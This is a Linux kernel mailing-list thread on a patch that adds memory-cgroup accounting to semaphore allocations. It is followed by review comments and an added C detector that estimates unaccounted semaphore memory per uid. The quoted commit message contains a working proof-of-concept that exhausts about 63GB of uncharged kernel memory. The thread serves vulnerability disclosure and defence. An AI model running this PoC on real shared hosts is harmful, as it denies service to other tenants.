From: Shakeel Butt
Date: Thu, 15 Jul 2021 10:05:42 -0700
Subject: Re: [PATCH] memcg: charge semaphores and sem_undo objects
To: Yutian Yang, Vasily Averin
Cc: Michal Hocko, Johannes Weiner, Vladimir Davydov, Cgroups, Linux MM, shenwenbo@zju.edu.cn
In-Reply-To: <1626333284-1404-1-git-send-email-nglaive@gmail.com>

+Vasily Averin

On Thu, Jul 15, 2021 at 12:15 AM Yutian Yang wrote:
>
> This patch adds accounting flags to semaphore and sem_undo allocation
> sites so that the kernel can correctly charge these objects.
>
> A malicious user could take up more than 63GB of unaccounted memory under
> default sysctl settings by exploiting the unaccounted objects. She could
> allocate up to 32,000 unaccounted semaphore sets with up to 32,000
> unaccounted semaphore objects in each set. She could further allocate one
> unaccounted sem_undo object for each semaphore set.
>
> The following code shows a PoC that takes ~63GB of unaccounted memory, while
> it is charged for less than 1MB of memory usage. We evaluated the PoC on
> QEMU x86_64 v5.2.90 + Linux kernel v5.10.19 + Debian buster.
>
> /*------------------------- POC code ----------------------------*/
> #define _GNU_SOURCE
> /* headers required by the calls below */
> #include <sys/types.h>
> #include <sys/ipc.h>
> #include <sys/sem.h>
> #include <stdio.h>
> #include <stdlib.h>
>
> #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
> } while (0)
>
> int main(int argc, char *argv[]) {
>     int err, semid;
>     struct sembuf sops;
>     /* 31200 sets of 31200 semaphores: both just under the default
>      * SEMMNI / SEMMSL limit of 32000 */
>     for (int i = 0; i < 31200; ++i) {
>         /* 0600 so an unprivileged creator passes the semop() permission
>          * check; without mode bits only CAP_IPC_OWNER may operate on the set */
>         semid = semget(IPC_PRIVATE, 31200, IPC_CREAT | 0600);
>         if (semid == -1) {
>             errExit("semget");
>         }
>         /* one SEM_UNDO operation makes the kernel allocate a sem_undo
>          * (with nsems adjustment slots) for this set */
>         sops.sem_num = 0;
>         sops.sem_op = 1;
>         sops.sem_flg = SEM_UNDO;
>         err = semop(semid, &sops, 1);
>         if (err == -1) {
>             errExit("semop");
>         }
>     }
>     /* stay alive: the sem_undo objects are released when the process exits */
>     while(1);
>     return 0;
> }
> /*-------------------------- end --------------------------------*/
>
> Thanks!
>
> Yutian Yang,
> Zhejiang University
>
> Signed-off-by: Yutian Yang

Thanks for the patch Yutian. I remember a patch from Vasily regarding memcg
charging of similar objects. Vasily, what's the status of your patch?

> ---
>  ipc/sem.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/ipc/sem.c b/ipc/sem.c
> index f6c30a85d..6860de0b1 100644
> --- a/ipc/sem.c
> +++ b/ipc/sem.c
> @@ -511,7 +511,7 @@ static struct sem_array *sem_alloc(size_t nsems)
>  	if (nsems > (INT_MAX - sizeof(*sma)) / sizeof(sma->sems[0]))
>  		return NULL;
>
> -	sma = kvzalloc(struct_size(sma, sems, nsems), GFP_KERNEL);
> +	sma = kvzalloc(struct_size(sma, sems, nsems), GFP_KERNEL_ACCOUNT);
>  	if (unlikely(!sma))
>  		return NULL;
>
> @@ -1935,7 +1935,7 @@ static struct sem_undo *find_alloc_undo(struct ipc_namespace *ns, int semid)
>  	rcu_read_unlock();
>
>  	/* step 2: allocate new undo structure */
> -	new = kzalloc(sizeof(struct sem_undo) + sizeof(short)*nsems, GFP_KERNEL);
> +	new = kzalloc(sizeof(struct sem_undo) + sizeof(short)*nsems, GFP_KERNEL_ACCOUNT);
>  	if (!new) {
>  		ipc_rcu_putref(&sma->sem_perm, sem_rcu_free);
>  		return ERR_PTR(-ENOMEM);
> --
> 2.25.1
>
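Review bot: the "~63GB" and "less than 1MB charged" figures in the commit message cannot be checked against the sem_alloc() hunk without the per-object sizes. The allocation being charged is struct_size(sma, sems, nsems), so what matters is sizeof(struct sem) times nsems per set; please state sizeof(struct sem) and sizeof(struct sem_array) for the kernel the numbers were measured on (v5.10.19, x86_64) so a reviewer can reproduce 32,000 x 32,000 x sizeof(struct sem) from the message alone instead of running the PoC.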
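Review bot: the find_alloc_undo() hunk introduces a user-visible failure mode that the commit message does not mention. With GFP_KERNEL_ACCOUNT the kzalloc() can now fail because the caller's cgroup is at its memory limit, and the visible error path (ipc_rcu_putref(&sma->sem_perm, sem_rcu_free); return ERR_PTR(-ENOMEM);) turns that into the first SEM_UNDO operation on an existing, otherwise healthy semaphore set failing with ENOMEM. That is the intended effect of charging, but please add a sentence to the commit message saying that semop() with SEM_UNDO can now return ENOMEM under memcg pressure, since callers that previously only saw ENOMEM on system-wide exhaustion may need to handle it.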
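The commit message above sizes the attack as up to 32,000 sets of 32,000 semaphores plus one sem_undo per set, and the point of the patch is that on an unpatched kernel none of that appears in the cgroup's memory.current. Until the fix is deployed, the place to look for such a build-up is /proc/sysvipc/sem (the file ipcs -s reads). The C program below is an added example written for this page, not code from the patch or its author: it parses a constructed sample of that file, aggregates sets and semaphore counts per owning uid, estimates the pinned kernel memory, and flags uids over a threshold; poc_total_bytes() applies the same estimate to the 31200 x 31200 PoC, which lands at roughly 60 GiB, the same order as the ~63GB the message reports. The per-object sizes it uses (64 bytes per struct sem, 256 bytes of sem_array header, 80 bytes of sem_undo header) are assumptions for an x86_64 v5.10 kernel, not values from the page; read the real ones with pahole on the target kernel. The column order is the one ipc/sem.c prints (key semid perms nsems uid gid cuid cgid otime ctime).

```c
#include <stdio.h>
#include <string.h>

/*
 * ASSUMED per-object sizes for x86_64 Linux 5.10 (the page gives none);
 * take real values from `pahole -C sem`, `pahole -C sem_array`, `pahole -C sem_undo`.
 */
#define ASSUMED_SIZEOF_SEM       64ULL  /* struct sem: semval, sempid, lock, two list_heads, otime */
#define ASSUMED_SEM_ARRAY_HDR   256ULL  /* struct sem_array before its flexible sems[] array */
#define ASSUMED_SEM_UNDO_HDR     80ULL  /* struct sem_undo before its nsems * sizeof(short) semadj */

struct uid_sems {
	unsigned uid;
	unsigned long sets;          /* semaphore sets owned by uid */
	unsigned long long nsems;    /* semaphores across those sets */
};

/* Bytes pinned by one set of nsems semaphores plus one sem_undo for it. */
unsigned long long estimate_set_bytes(unsigned nsems)
{
	unsigned long long arr  = ASSUMED_SEM_ARRAY_HDR + nsems * ASSUMED_SIZEOF_SEM;
	unsigned long long undo = ASSUMED_SEM_UNDO_HDR + nsems * (unsigned long long)sizeof(short);
	return arr + undo;
}

/* What the PoC pins: nsets sets of nsems semaphores, one SEM_UNDO each. */
unsigned long long poc_total_bytes(unsigned nsets, unsigned nsems)
{
	return nsets * estimate_set_bytes(nsems);
}

/* Parse one data line of /proc/sysvipc/sem; the header line fails and is skipped. */
int parse_sem_line(const char *line, unsigned *uid, unsigned *nsems)
{
	int key, semid;
	unsigned perms, gid, cuid, cgid;
	unsigned long long otime, ctime;

	return sscanf(line, "%d %d %o %u %u %u %u %u %llu %llu",
		      &key, &semid, &perms, nsems, uid, &gid, &cuid, &cgid,
		      &otime, &ctime) == 10;
}

/* Aggregate sets and semaphores per owning uid; returns uid count or -1 if out is full. */
int aggregate_by_uid(const char *proc_text, struct uid_sems *out, int max)
{
	const char *p = proc_text;
	int n = 0;

	while (*p) {
		const char *nl = strchr(p, '\n');
		size_t full = nl ? (size_t)(nl - p) : strlen(p);
		size_t len = full < 255 ? full : 255;
		char line[256];
		unsigned uid, nsems;
		int i;

		memcpy(line, p, len);
		line[len] = '\0';
		p = nl ? nl + 1 : p + full;

		if (!parse_sem_line(line, &uid, &nsems))
			continue;
		for (i = 0; i < n && out[i].uid != uid; i++)
			;
		if (i == n) {
			if (n == max)
				return -1;
			out[n].uid = uid;
			out[n].sets = 0;
			out[n].nsems = 0;
			n++;
		}
		out[i].sets++;
		out[i].nsems += nsems;
	}
	return n;
}

/* Estimate for one uid: array + undo header per set, sem + semadj slot per semaphore. */
unsigned long long estimate_uid_bytes(const struct uid_sems *u)
{
	return u->sets * (ASSUMED_SEM_ARRAY_HDR + ASSUMED_SEM_UNDO_HDR)
	     + u->nsems * (ASSUMED_SIZEOF_SEM + sizeof(short));
}

/* Write uids whose estimate exceeds limit_bytes to flagged[]; returns how many. */
int flag_over_limit(const struct uid_sems *agg, int n, unsigned long long limit_bytes,
		    unsigned *flagged, int max_flagged)
{
	int k = 0;

	for (int i = 0; i < n; i++)
		if (estimate_uid_bytes(&agg[i]) > limit_bytes && k < max_flagged)
			flagged[k++] = agg[i].uid;
	return k;
}

/* Constructed sample of /proc/sysvipc/sem for this example, not a real capture. */
const char SAMPLE_PROC_SEM[] =
	"       key      semid perms      nsems   uid   gid  cuid  cgid      otime      ctime\n"
	"         0          0   600          1  1000  1000  1000  1000 1626368700 1626368700\n"
	"         0          1   600      31200  1001  1001  1001  1001 1626368701 1626368701\n"
	"         0          2   600      31200  1001  1001  1001  1001 1626368702 1626368702\n"
	"         0          3   600      31200  1001  1001  1001  1001 1626368703 1626368703\n"
	"1234567890          4   666         16     0     0     0     0 1626368704 1626368704\n";

int main(void)
{
	struct uid_sems agg[64];
	unsigned flagged[64];
	int n = aggregate_by_uid(SAMPLE_PROC_SEM, agg, 64);
	int k = flag_over_limit(agg, n, 1ULL << 20, flagged, 64);

	printf("PoC (31200 x 31200 + SEM_UNDO) pins about %llu MiB outside memcg\n",
	       poc_total_bytes(31200, 31200) >> 20);
	for (int i = 0; i < n; i++)
		printf("uid %u: %lu sets, %llu sems, ~%llu KiB\n", agg[i].uid,
		       agg[i].sets, agg[i].nsems, estimate_uid_bytes(&agg[i]) >> 10);
	printf("%d uid(s) over 1 MiB\n", k);
	return 0;
}
```

On a live host, feed the program the real file (for example by reading /proc/sysvipc/sem into a buffer and passing it to aggregate_by_uid) and compare the per-uid estimate with the cgroup's memory.stat: a large gap is exactly the unaccounted memory this patch closes. The estimate treats every set as having one sem_undo, which undercounts when several processes use SEM_UNDO on the same set.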